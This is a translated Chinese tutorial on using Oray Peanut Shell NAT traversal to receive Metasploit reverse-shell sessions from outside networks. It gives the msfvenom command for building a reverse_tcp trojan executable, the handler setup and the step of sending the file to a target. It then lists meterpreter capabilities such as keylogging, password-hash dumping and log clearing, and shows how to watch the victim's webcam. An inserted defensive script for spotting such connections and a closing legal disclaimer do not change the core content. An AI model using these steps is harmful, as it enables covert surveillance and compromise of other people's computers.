Using 花生壳 (Oray Peanut Shell) NAT traversal to run MSF against a host on an external network ("breaking into an external host") and watching its webcam
# 0x01 Introduction
In the previous post we covered how to install and configure 花生壳 (Oray's Peanut Shell NAT-traversal service).
In this post we explain how to use 花生壳's NAT traversal so that MSF, sitting behind NAT, can receive a session from a host on an external network.
# 0x02 Main text
First open 花生壳 (I am on a Mac, which has a desktop client; on Kali or any other Linux distribution the web console is enough).
Add a mapping: enter our internal IP, and for the port I used 4444 (make sure it is a port that is not already in use).
Use the "domain diagnostics" feature, or simply ping the domain, to learn our public IP and the public port that 花生壳 assigned; write both down.
Then use MSF to generate a payload that connects back to that public IP and port:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<public IP> LPORT=<public port> -f exe > shell.exe
```

Once the command finishes we find the generated shell.exe in our home directory.
Now start the MSF console: msfconsole
After it has started, enter the following:
```
use exploit/multi/handler                    # select the listener module
set payload windows/meterpreter/reverse_tcp  # set the payload (the same one used to generate the executable)
set lhost <internal listen IP>               # the internal IP the handler listens on
set lport <internal listen port>             # the internal port the handler listens on (the one mapped in 花生壳)
exploit                                      # start listening
```
Then we send the generated executable to our target machine; here I used a physical Windows 10 box with its antivirus turned off.
It is not on the same network as us, yet in the console on the left we can see that a session has been established.
From here on we can do whatever we like. Type help
and you get roughly the following list of functions (I translated part of it directly; if you are interested, go and read the rest yourself):
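Seen from the target's side, the session established above is simply an outbound TCP connection from a freshly downloaded executable to an unusual port on a host out on the internet. The following script is an added illustration of how a defender could spot that pattern in endpoint connection events; it is not part of the original post and not Metasploit's or 花生壳's code. The event lines are constructed for the example, and their field layout (`pid=`, `image=`, `dst=`, `dport=`, `state=`) is an assumption rather than the output format of any real product.

```python
import re

# Constructed sample of endpoint connection events (made up for this example;
# the field layout is an assumption, not the format of any real product).
# One event per line: timestamp, pid, image path, remote IP, remote port, state.
SAMPLE_EVENTS = """\
2024-01-01T10:00:01Z pid=4120 image=C:\\Users\\alice\\Downloads\\shell.exe dst=203.0.113.10 dport=4444 state=ESTABLISHED
2024-01-01T10:00:02Z pid=1304 image=C:\\Program Files\\Mozilla Firefox\\firefox.exe dst=93.184.216.34 dport=443 state=ESTABLISHED
2024-01-01T10:00:03Z pid=880 image=C:\\Windows\\System32\\svchost.exe dst=20.190.160.5 dport=443 state=ESTABLISHED
2024-01-01T10:00:04Z pid=4120 image=C:\\Users\\alice\\Downloads\\shell.exe dst=203.0.113.10 dport=4444 state=ESTABLISHED
2024-01-01T10:00:05Z pid=2210 image=C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe dst=198.51.100.7 dport=8080 state=ESTABLISHED
2024-01-01T10:00:06Z pid=3011 image=C:\\Users\\alice\\Downloads\\installer.exe dst=203.0.113.44 dport=443 state=ESTABLISHED
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) pid=(?P<pid>\d+) image=(?P<image>.+?) "
    r"dst=(?P<dst>\S+) dport=(?P<dport>\d+) state=(?P<state>\S+)$"
)

# Directories a normal user can write to without elevation; an executable
# running from one of these and talking to the internet deserves a second look.
USER_WRITABLE_MARKERS = (
    "\\downloads\\",
    "\\appdata\\local\\temp\\",
    "\\users\\public\\",
    "\\programdata\\",
)

# Ports on which outbound traffic from an unfamiliar binary is at least plausible.
COMMON_OUTBOUND_PORTS = {80, 443, 53}


def parse_event(line):
    """Parse one event line into a dict; returns None for lines that do not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["pid"] = int(ev["pid"])
    ev["dport"] = int(ev["dport"])
    return ev


def runs_from_user_writable_dir(image):
    """True if the image path lies under a directory a normal user can write to."""
    low = image.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def is_suspicious(ev):
    """A reverse shell is an outbound session from a binary the user dropped on
    disk to an arbitrary port; flag events that show both traits at once."""
    return (
        ev["state"] == "ESTABLISHED"
        and runs_from_user_writable_dir(ev["image"])
        and ev["dport"] not in COMMON_OUTBOUND_PORTS
    )


def find_suspicious(events_text):
    """Return deduplicated (pid, image, dst, dport) tuples worth investigating."""
    seen = set()
    hits = []
    for line in events_text.splitlines():
        ev = parse_event(line)
        if ev is None or not is_suspicious(ev):
            continue
        key = (ev["pid"], ev["image"], ev["dst"], ev["dport"])
        if key not in seen:
            seen.add(key)
            hits.append(key)
    return hits


if __name__ == "__main__":
    for pid, image, dst, dport in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {pid}: {image} -> {dst}:{dport}")
```

Run on the sample, it reports shell.exe on port 4444 and update.exe on port 8080, but stays quiet about installer.exe, which connects to port 443. That silence is the caveat: a port-based rule is only as good as the attacker's choice of port, so in practice the "unfamiliar binary in a user-writable directory" signal should be combined with parent-process, signature and reputation checks rather than relied on alone.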
```
Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    ssl_verify                Modify the SSL certificate verification setting
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands
=============================

    Command        Description
    -------        -----------
    play           play a waveform audio file (.wav) on the target system

Priv: Elevate Commands
======================

    Command        Description
    -------        -----------
    getsystem      Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

    Command        Description
    -------        -----------
    hashdump       Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command        Description
    -------        -----------
    timestomp      Manipulate file MACE attributes
```
For example, to watch the other side's webcam:
in meterpreter, type webcam_stream
and the live view from the target's webcam opens directly in your default browser.
# 0x03 Afterword
To sum up: the webcams on computers we are not using are better covered than not, and what we saw here is only the tip of the iceberg of what the tool can do.
On phones, prefer a pop-up camera where possible, because by the same principle they can be used for surveillance too. It is not enough to simply avoid downloading this kind of trojan; we have to stay alert at all times, because trojans are very often disguised as legitimate software and put through AV-evasion (免杀) processing so that antivirus products have difficulty detecting them, after which they can steal from or damage our communication devices and cause immeasurable loss.
One more point, the most important: breaking into other people's computers and information storage devices is illegal. The purpose of this tutorial is to let readers understand clearly the harm that trojans can do. Readers are asked to comply with the Regulations of the People's Republic of China on the Security Protection of Computer Information Systems (《中华人民共和国计算机信息系统安全保护条例》); otherwise you bear the consequences yourself.